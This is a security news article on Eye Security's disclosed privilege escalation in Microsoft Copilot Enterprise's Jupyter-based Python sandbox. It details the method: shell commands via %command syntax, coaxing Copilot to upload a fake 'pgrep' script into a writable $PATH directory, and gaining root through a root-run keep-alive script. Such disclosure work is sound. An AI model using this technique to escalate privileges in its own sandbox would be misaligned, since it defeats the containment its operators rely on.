Microsoft Copilot Rooted to Gain Unauthorized Root Access to its Backend System
A critical security vulnerability has been discovered in Microsoft Copilot Enterprise, allowing unauthorized users to gain root access to its backend container.
This vulnerability poses a significant risk, potentially allowing malicious users to manipulate system settings, access sensitive data, and compromise the application’s integrity.
The issue originated from an April 2025 update that introduced a live Python sandbox powered by Jupyter Notebook, designed to execute code seamlessly. What began as a feature enhancement turned into a playground for exploitation, highlighting risks in AI-integrated systems.
The vulnerability uncovered by Eye Security, which playfully likened interacting with Copilot to coaxing an unpredictable child. Using Jupyter’s %command syntax, they executed arbitrary Linux commands as the ‘ubuntu’ user within a miniconda environment.

Despite the user being in the sudo group, no sudo binary existed, adding an ironic layer to the setup. The sandbox mirrored ChatGPT’s model but boasted a newer kernel and Python 3.12, compared to ChatGPT’s 3.11 at the time.
Exploration revealed the sandbox’s core role in running Jupyter Notebooks alongside a Tika server. The container featured a limited link-local network interface with a /32 netmask, utilizing an OverlayFS filesystem linked to a /legion path on the host.
Custom scripts resided in the /app directory, and after persistent commands, Copilot could be convinced to download files or tar folders, copying them to /mnt/data for external access via blob links on outlook.office[.]com.
A key binary, goclientapp in /app, acted as the container’s interface, running a web server on port 6000 for POST requests to /execute endpoints.
Simple JSON payloads, like {“code”:”%env”}, triggered code execution in the Jupyter environment. An httpproxy binary hinted at future outbound traffic capabilities, though egress was disabled.
The entrypoint.sh script, running as root, proved pivotal. It dropped privileges for most processes but launched keepAliveJupyterSvc.sh as root. A critical oversight in line 28 involved a pgrep command without a full path, executed in a ‘while true’ loop every two seconds.

This relied on the $PATH variable, which included writable directories like /app/miniconda/bin before /usr/bin, where the legitimate pgrep resides.
Exploiting this, researchers crafted a malicious Python script disguised as pgrep in the writable path. Uploaded via Copilot, it read commands from /mnt/data/in, executed them with popen, and output to /mnt/data/out.

This granted root access, enabling filesystem exploration, though no sensitive data or breakout paths were found, as known vulnerabilities were patched.
Eye Security reported the issue to Microsoft’s Security Response Center (MSRC) on April 18, 2025. The vulnerability was fixed by July 25, classified as moderate severity. No bounty was awarded, only an acknowledgment on Microsoft’s researcher page.
The researchers noted the exploit yielded “absolutely nothing” beyond fun, but teased further discoveries, including access to the Responsible AI Operations panel for Copilot and 21 internal services via Entra OAuth abuse.
This incident underscores the double-edged sword of AI sandboxes: innovative yet vulnerable to creative attacks. Microsoft has not publicly commented, but the swift fix demonstrates proactive security measures in evolving AI landscapes.
Experience faster, more accurate phishing detection and enhanced protection for your business with real-time sandbox analysis-> Try ANY.RUN now
Source link